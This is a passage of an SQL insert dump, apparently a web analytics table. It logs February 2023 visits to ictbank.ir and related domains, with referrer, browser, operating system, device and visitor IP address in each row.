(28961,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','134.96.225.236','000',0,1,0),
(28962,'2023-02-16','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','202.3.214.129','000',0,2,0),
(28963,'2023-02-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(28964,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,10,0),
(28965,'2023-02-16','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28966,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,6,0),
(28967,'2023-02-16','https://ictbank.ir/hooman/admin/','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.237.175.37','000',0,163,0),
(28968,'2023-02-16','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.212.47.70','000',0,1,0),
(28969,'2023-02-16','http://www.google.com.hk','Chrome','Windows','42.0.0.0','desktop','Unknown','','209.141.51.44','000',0,1,0),
(28970,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.211.26.117','000',0,1,0),
(28971,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.55','000',0,2,0),
(28972,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','138.197.134.245','000',0,7,0),
(28973,'2023-02-16','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.109','000',0,1,0),
(28974,'2023-02-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(28975,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,2,0),
(28976,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,3,0),
(28977,'2023-02-16','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,1,0),
(28978,'2023-02-16','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(28979,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,2,0),
(28980,'2023-02-16','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','114.108.148.220','000',0,2,0),
(28981,'2023-02-16','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','89.146.106.65','000',0,1,0),
(28982,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.87.152','000',0,1,0),
(28983,'2023-02-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.180.120.176','000',0,1,0),
(28984,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.34','000',0,3,0),
(28985,'2023-02-16','https://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','212.71.252.92','000',0,1,0),
(28986,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,5,0),
(28987,'2023-02-16','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','87.204.89.154','000',0,2,0),
(28988,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.119.71.253','000',0,1,0),
(28989,'2023-02-16','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(28990,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.22','000',0,3,0),
(28991,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.49','000',0,1,0),
(28992,'2023-02-16','https://45.92.94.221:443/blog','Chrome','Linux','86.0.0','desktop','Unknown','','36.156.28.133','000',0,2,0),
(28993,'2023-02-16','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','192.64.5.168','000',0,11,0),
(28994,'2023-02-16','https://www.google.com/','Firefox','Windows','109.0','desktop','Unknown','','201.48.221.200','000',0,1,0),
(28995,'2023-02-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','147.135.36.144','000',0,1,0),
(28996,'2023-02-16','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','177.247.111.177','000',0,1,0),
(28997,'2023-02-16','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
(28998,'2023-02-16','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.122','000',0,1,0),
(28999,'2023-02-16','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.51','000',0,1,0),
(29000,'2023-02-16','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.24','000',0,1,0),
(29001,'2023-02-16','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.80','000',0,1,0),
(29002,'2023-02-16','https://www.neginghavami.ir/blog','UC Browser','Series40','2.0','mobile:feature','Asha 203','','58.17.6.9','000',0,2,0),
(29003,'2023-02-16','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','45.55.67.92','000',0,2,0),
(29004,'2023-02-17','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.1.79.176','000',0,3,0),
(29005,'2023-02-17','https://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(29006,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','159.65.7.19','000',0,1,0),
(29007,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','165.22.178.231','000',0,1,0),
(29008,'2023-02-17','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,6,0),
(29009,'2023-02-17','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','143.42.102.41','000',0,1,0),
(29010,'2023-02-17','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','143.42.102.33','000',0,1,0),
(29011,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,30,0),
(29012,'2023-02-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(29013,'2023-02-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.21','000',0,3,0),
(29014,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.144.64','000',0,2,0),
(29015,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(29016,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.185.31','000',0,1,0),
(29017,'2023-02-17','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(29018,'2023-02-17','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','143.42.102.184','000',0,1,0),
(29019,'2023-02-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,6,0),
(29020,'2023-02-17','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','143.42.102.181','000',0,2,0),
(29021,'2023-02-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(29022,'2023-02-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,1,0),
(29023,'2023-02-17','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','41.90.216.209','000',0,1,0),
(29024,'2023-02-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.28','000',0,2,0),
(29025,'2023-02-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.39','000',0,2,0),
(29026,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.212.85','000',0,2,0),
(29027,'2023-02-17','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(29028,'2023-02-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(29029,'2023-02-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.37','000',0,2,0),
(29030,'2023-02-17','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,3,0),
(29031,'2023-02-17','https://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,6,0),
(29032,'2023-02-17','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,2,0),
(29033,'2023-02-17','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,3,0),
(29034,'2023-02-17','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,2,0),
(29035,'2023-02-17','https://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(29036,'2023-02-17','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,2,0),
(29037,'2023-02-17','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,2,0),
(29038,'2023-02-17','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(29039,'2023-02-17','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(29040,'2023-02-17','https://ictbank.ir/blog','Sogou Explorer','Windows','Unknown','desktop','Unknown','','120.27.13.61','000',0,1,0),
(29041,'2023-02-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,4,0),
(29042,'2023-02-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,4,0),
(29043,'2023-02-17','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','18.209.212.133','000',0,1,0),
(29044,'2023-02-17','https://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','176.9.114.107','000',0,5,0),
(29045,'2023-02-17','https://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','5.9.90.66','000',0,8,0),
(29046,'2023-02-17','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','170.83.103.174','000',0,1,0),
(29047,'2023-02-17','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','136.144.170.17','000',0,1,0),
(29048,'2023-02-17','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.80','000',0,1,0),
(29049,'2023-02-17','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.120','000',0,1,0),
(29050,'2023-02-17','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.122','000',0,1,0),
(29051,'2023-02-17','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.11','000',0,1,0),
(29052,'2023-02-17','https://ictbank.ir/blog','Chrome','iOS','110.0.0.0','mobile:smart','iPhone','','173.252.127.16','000',0,1,0),
(29053,'2023-02-17','https://l.instagram.com/','Instagram','Android','270.0.0.0.0','mobile:smart','Galaxy S21 FE','','172.93.179.12','000',0,1,0),
(29054,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','185.81.157.235','000',0,1,0),
(29055,'2023-02-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(29056,'2023-02-18','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29057,'2023-02-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.0.38.81','000',0,1,0),
(29058,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(29059,'2023-02-18','http://ictbank.ir','Safari','OS X','13.0.0','desktop','Macintosh','','185.220.101.38','000',0,1,0),
(29060,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(29061,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','185.225.33.22','000',0,1,0),
(29062,'2023-02-18','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','79.120.76.144','000',0,1,0),
(29063,'2023-02-18','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.141.105','000',0,1,0),
(29064,'2023-02-18','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(29065,'2023-02-18','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(29066,'2023-02-18','https://ictbank.ir/hooman/admin/','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.237.132.159','000',0,69,0),
(29067,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.65.95','000',0,1,0),
(29068,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','92.0.0','desktop','Unknown','','106.75.126.29','000',0,3,0),
(29069,'2023-02-18','https://neginghavami.ir/blog/sitemap.xml','Chrome','Linux','86.0.0','desktop','Unknown','','106.75.75.21','000',0,4,0),
(29070,'2023-02-18','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(29071,'2023-02-18','https://ictbank.ir/blog','Firefox','Ubuntu','107.0','desktop','Unknown','','139.91.70.45','000',0,1,0),
(29072,'2023-02-18','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.8','000',0,3,0),
(29073,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29074,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','172.105.98.193','000',0,3,0),
(29075,'2023-02-18','https://design-arena.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.89','000',0,2,0),
(29076,'2023-02-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,12,0),
(29077,'2023-02-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(29078,'2023-02-18','http://ictbank.ir/','Chrome','Android','104.0.0.0','tablet','Unknown','','204.18.34.70','000',0,1,0),
(29079,'2023-02-18','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,4,0),
(29080,'2023-02-18','https://design-arena.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.87','000',0,2,0),
(29081,'2023-02-18','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(29082,'2023-02-18','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','193.56.254.114','000',0,1,0),
(29083,'2023-02-18','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','103.197.115.43','000',0,1,0),
(29084,'2023-02-18','https://ictbank.ir/blog','Chrome','Android','92.0.0.0','mobile:smart','Galaxy S5','','109.128.219.10','000',0,1,0),
(29085,'2023-02-18','https://ictbank.ir/blog','Chrome','Windows','89.0.0.0','desktop','Unknown','','185.220.14.197','000',0,1,0),
(29086,'2023-02-19','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.155','000',0,1,0),
(29087,'2023-02-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(29088,'2023-02-19','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(29089,'2023-02-19','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','5.2.77.22','000',0,1,0),
(29090,'2023-02-19','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','45.154.98.33','000',0,1,0),
(29091,'2023-02-19','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29092,'2023-02-19','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','51.159.105.232','000',0,1,0),
(29093,'2023-02-19','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,1,0),
(29094,'2023-02-19','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,5,0),
(29095,'2023-02-19','https://ictbank.ir/hooman/admin/','Chrome','Windows','109.0.0.0','desktop','Unknown','','151.234.192.33','000',0,42,0),
(29096,'2023-02-19','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','94.102.49.190','000',0,1,0),
(29097,'2023-02-19','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,4,0),
(29098,'2023-02-19','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','71.6.158.166','000',0,1,0),
(29099,'2023-02-19','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.218.71.241','000',0,1,0),
(29100,'2023-02-19','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.146','000',0,1,0),
(29101,'2023-02-19','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(29102,'2023-02-19','https://ictbank.ir/blog','Chrome','Windows','50.0.0.0','desktop','Unknown','','18.234.170.135','000',0,1,0),
(29103,'2023-02-19','https://www.google.com/','Chrome','Windows','110.0.0.0','desktop','Unknown','','42.191.27.92','000',0,1,0),
(29104,'2023-02-19','https://www.google.com/','Chrome','Windows','110.0.0.0','desktop','Unknown','','70.66.225.47','000',0,1,0),
(29105,'2023-02-19','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','49.37.168.159','000',0,1,0),
(29106,'2023-02-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.161.104.87','000',0,2,0),
(29107,'2023-02-19','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.12','000',0,2,0),
(29108,'2023-02-20','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,1,0),
(29109,'2023-02-20','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.208','000',0,1,0),
(29110,'2023-02-20','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.229','000',0,1,0),
(29111,'2023-02-20','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.193','000',0,1,0),
(29112,'2023-02-20','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.207','000',0,1,0),
(29113,'2023-02-20','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(29114,'2023-02-20','https://ictbank.ir/blog','Firefox','Windows','99.0','desktop','Unknown','','149.56.20.160','000',0,3,0),
(29115,'2023-02-20','https://45.92.94.221:443/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(29116,'2023-02-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,1,0),
(29117,'2023-02-20','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(29118,'2023-02-20','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29119,'2023-02-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(29120,'2023-02-20','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(29121,'2023-02-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(29122,'2023-02-20','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(29123,'2023-02-20','https://ictbank.ir/hooman/admin/','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.237.181.37','000',0,34,0),
(29124,'2023-02-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.115.205','000',0,1,0),
(29125,'2023-02-20','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29126,'2023-02-20','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','191.102.148.147','000',0,2,0),
(29127,'2023-02-20','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','191.102.143.86','000',0,5,0),
(29128,'2023-02-20','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','137.184.140.67','000',0,1,0),
(29129,'2023-02-20','https://www.google.com/','Chrome','OS X','95.0.0.0','desktop','Macintosh','','5.53.45.102','000',0,1,0),
(29130,'2023-02-20','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','109.0.0.0','desktop','Unknown','','176.58.121.243','000',0,85,0),
(29131,'2023-02-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,3,0),
(29132,'2023-02-20','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(29133,'2023-02-20','https://ictbank.ir/blog','Chrome','OS X','83.0.0.0','desktop','Macintosh','','3.84.182.206','000',0,3,0),
(29134,'2023-02-20','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=19&func=courses','Chrome','Windows','109.0.0.0','desktop','Unknown','','172.104.111.132','000',0,1,0),
(29135,'2023-02-20','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','194.33.45.67','000',0,6,0),
(29136,'2023-02-20','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','5.238.234.241','000',0,1,0),
(29137,'2023-02-20','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=19&func=courses','Chrome','Windows','109.0.0.0','desktop','Unknown','','77.238.112.173','000',0,68,0),
(29138,'2023-02-20','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','194.169.175.26','000',0,1,0),
(29139,'2023-02-20','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Unknown','','146.190.107.66','000',0,1,0),
(29140,'2023-02-20','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','46.109.12.225','000',0,2,0),
(29141,'2023-02-20','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.48.49','000',0,1,0),
(29142,'2023-02-20','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','192.141.73.219','000',0,6,0),
(29143,'2023-02-20','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','77.32.68.242','000',0,1,0),
(29144,'2023-02-20','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','138.59.177.158','000',0,1,0),
(29145,'2023-02-20','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','23.229.63.215','000',0,1,0),
(29146,'2023-02-20','http://ictbank.ir','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.186.168.79','000',0,1,0),
(29147,'2023-02-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(29148,'2023-02-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,4,0),
(29149,'2023-02-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,1,0),
(29150,'2023-02-21','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29151,'2023-02-21','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(29152,'2023-02-21','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(29153,'2023-02-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(29154,'2023-02-21','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','37.139.179.19','000',0,3,0),
(29155,'2023-02-21','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.174','000',0,26,0),
(29156,'2023-02-21','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(29157,'2023-02-21','https://www.google.com/','Chrome','Windows','110.0.0.0','desktop','Unknown','','89.227.248.75','000',0,1,0),
(29158,'2023-02-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(29159,'2023-02-21','https://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','5.9.90.66','000',0,1,0),
(29160,'2023-02-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(29161,'2023-02-21','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.211.142.21','000',0,1,0),
(29162,'2023-02-21','https://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','43.130.122.222','000',0,6,0),
(29163,'2023-02-21','https://ictbank.ir/hooman/admin/','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.238.38.20','000',0,86,0),
(29164,'2023-02-21','https://ictbank.ir/dashtpodcast/feed/podcast/','Chrome','Windows','109.0.0.0','desktop','Unknown','','96.126.104.130','000',0,1,0),
(29165,'2023-02-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','18.208.174.241','000',0,1,0),
(29166,'2023-02-23','https://ictbank.ir/hooman/admin/index.php?pid=students&func=add','Chrome','Windows','109.0.0.0','desktop','Unknown','','77.238.113.121','000',0,29,0),
(29167,'2023-02-23','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(29168,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','47.87.142.167','000',0,1,0),
(29169,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.171.180.139','000',0,1,0),
(29170,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','166.62.122.244','000',0,1,0),
(29171,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','37.139.179.19','000',0,5,0),
(29172,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','83.150.215.90','000',0,1,0),
(29173,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','159.89.191.176','000',0,1,0),
(29174,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.183.122.143','000',0,1,0),
(29175,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','176.223.123.199','000',0,1,0),
(29176,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','8.210.55.148','000',0,1,0),
(29177,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','162.241.174.216','000',0,1,0),
(29178,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','192.115.100.180','000',0,1,0),
(29179,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','162.240.214.96','000',0,2,0),
